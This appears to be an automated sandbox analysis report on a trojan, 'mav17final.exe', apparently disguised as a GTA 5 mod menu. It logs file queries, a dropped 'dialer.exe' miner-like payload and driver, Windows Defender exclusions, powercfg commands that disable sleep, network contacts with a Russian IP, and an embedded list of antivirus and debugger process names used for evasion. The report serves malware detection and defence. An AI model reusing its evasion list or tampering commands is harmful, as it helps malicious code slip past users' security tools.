      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\_socket.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\select.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\_bz2.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\_lzma.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\psutil VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\psutil VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\psutil VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\Desktop\mav17final.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeQueries volume information: C:\Users\user\AppData\Local\Temp\dialer.exe VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 0_2_00007FF79EA4C390 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF79EA4C390
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 0_2_00007FF79EA617BC _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF79EA617BC
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 2_2_00007FF8B9074610 RtlGetVersion,GetSystemInfo,InitializeCriticalSection,2_2_00007FF8B9074610
      Source: C:\Windows\System32\dwm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Lowering of HIPS / PFW / Operating System Security Settings

      Source: C:\Users\user\AppData\Local\Temp\dialer.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      Source: C:\Users\user\AppData\Local\Temp\dialer.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      Source: C:\ProgramData\dialer.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      Source: C:\ProgramData\dialer.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: bdagent.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: fsgk32st.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: avguard.exe
      Source: mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2067450371.0000018718D54000.00000004.00001000.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: savadminservice.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: avcenter.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: f-prot.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: BullGuard.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: cfp.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: avp.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: wireshark.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zlclient.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GDFwSvc.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dwengine.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: drweb32w.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: avgtray.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: McShield.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: a2guard.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: savservice.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: fsav.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ollydbg.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: a2service.exe
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B93C5610 _PyArg_ParseTuple_SizeT,PyEval_SaveThread,listen,PyEval_RestoreThread,_Py_NoneStruct,2_2_00007FF8B93C5610
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B93C45E8 PySys_Audit,PyEval_SaveThread,bind,PyEval_RestoreThread,_Py_NoneStruct,2_2_00007FF8B93C45E8
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 2 Native API | 12 Windows Service | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 System Service Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 3 Service Execution | 1 Bootkit | 12 Windows Service | 2 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 111 Process Injection | 1 DLL Side-Loading | NTDS | 27 System Information Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 File Deletion | LSA Secrets | 341 Security Software Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 131 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 131 Virtualization/Sandbox Evasion | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 111 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Bootkit | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
Behavior Graph ID: 1445527, Sample: mav17final.exe, Startdate: 22/05/2024, Architecture: WINDOWS, Score: 100
DNS: gta5modmenufree.com
Signatures on the sample: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 5 other signatures
Process tree (leading number is the graph node ID; trailing numbers are the node's counters as shown in the graph):
11 mav17final.exe 20
    dropped: C:\Users\user\AppData\...\unicodedata.pyd (PE32+); C:\Users\user\AppData\Local\...\select.pyd (PE32+); C:\Users\user\AppData\Local\...\python311.dll (PE32+); 14 other malicious files
    signatures: Contains functionality to infect the boot sector; Adds a directory exclusion to Windows Defender
    19 mav17final.exe 2
        dropped: C:\Users\user\AppData\Local\Temp\dialer.exe (PE32+)
        signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Adds a directory exclusion to Windows Defender
        32 cmd.exe 1
            51 dialer.exe 1 1
                dropped: C:\ProgramData\dialer.exe (PE32+)
                signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 3 other signatures
                61 powershell.exe 23 (Loading BitLocker PowerShell Module)
                    70 conhost.exe
                64 cmd.exe 1
                    72 conhost.exe
                    74 wusa.exe
                66 powercfg.exe 1
                    76 conhost.exe
                68 12 other processes
                    78 conhost.exe; 80 conhost.exe; 82 conhost.exe; 84 9 other processes
            55 conhost.exe
        34 cmd.exe 1 (Adds a directory exclusion to Windows Defender)
            57 powershell.exe 22 (Loading BitLocker PowerShell Module)
            59 conhost.exe
15 dialer.exe
    dropped: C:\Windows\Temp\ujjtjyeszdwn.sys (PE32+)
    signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Modifies the context of a thread in another process (thread injection); 2 other signatures
    23 powershell.exe (Loading BitLocker PowerShell Module)
        37 conhost.exe
    25 dwm.exe (Query firmware table information (likely to detect VMs))
        network: 77.105.166.179, ports 49704, 49706, 7752, ICOMF-ASRU, Russian Federation; gta5modmenufree.com 188.114.96.3, ports 443, 49705, CLOUDFLARENETUS, European Union
    28 cmd.exe
        39 conhost.exe
        41 wusa.exe
    30 10 other processes
        43 conhost.exe; 45 conhost.exe; 47 conhost.exe; 49 6 other processes
17 svchost.exe

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| mav17final.exe | 34% | ReversingLabs | Win64.Trojan.Generic | |
